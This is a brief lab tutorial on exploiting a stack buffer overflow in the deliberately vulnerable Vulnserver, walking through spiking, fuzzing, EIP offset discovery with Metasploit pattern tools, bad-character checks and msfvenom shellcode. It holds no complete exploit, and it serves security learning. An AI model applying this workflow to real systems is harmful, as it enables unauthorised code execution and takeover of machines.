Buffer Overflow
Last updated
Last updated
Buffer overflow is a common vulnerability in applications or programs that accepts more data than the allocated buffer.
This guide assumes that you have access to run the (potential) vulnerable application in Immunity Debugger.
Windows machine
Linux machine
Install Immunity Debugger at the Windows machine
Run the Vulnserver in Immunity Debugger
Connect to the Vulnserver from Kali: nc -nv <Target IP> 9999
Spiking involves sending crafted packets or input to a target application to make it crash. The purpose is to identify potential vulnerabilities. If the application crashes, it may indicate that there's a weakness that can be exploited.
Fuzzing is a systematic approach where you send increasing amounts of data to the target application to identify the exact number of bytes required to trigger a crash. The primary goal is to determine the location of the EIP (Extended Instruction Pointer), which is a register crucial to the exploitation process.
Once you've determined the location of the EIP, you can use tools like Metasploit's pattern_create and pattern_offset to find the exact offset or distance from the start of your input to the EIP. Knowing this offset is essential for crafting a precise exploit.
pattern_create: sudo /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <length>
pattern_offset: sudo /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l <length> -q <pattern>
After identifying the EIP offset, the next step is to overwrite the EIP register with a controlled value. By doing this, you gain the ability to redirect the program's execution flow to a location of your choice, typically pointing to your shellcode.
During the process, you'll want to identify any "bad characters" that may interfere with the proper execution of your shellcode. Bad characters are bytes or values that, when present in your payload, could disrupt the intended exploit. Identifying and avoiding these characters is crucial for a successful exploit.
In the context of a vulnerable server or application, it's important to identify the specific module or component that contains the vulnerability. This module is often the one that processes the user input and is susceptible to buffer overflow attacks.
Shellcode is the payload that you inject into the target application to execute arbitrary code. Tools like msfvenom (from the Metasploit Framework) can be used to generate shellcode tailored to your specific needs. The shellcode typically establishes a connection or provides a means to control the compromised system.
Once the EIP is successfully controlled and the shellcode is injected into the target application, you can exploit the vulnerability to gain access to the system or execute arbitrary commands.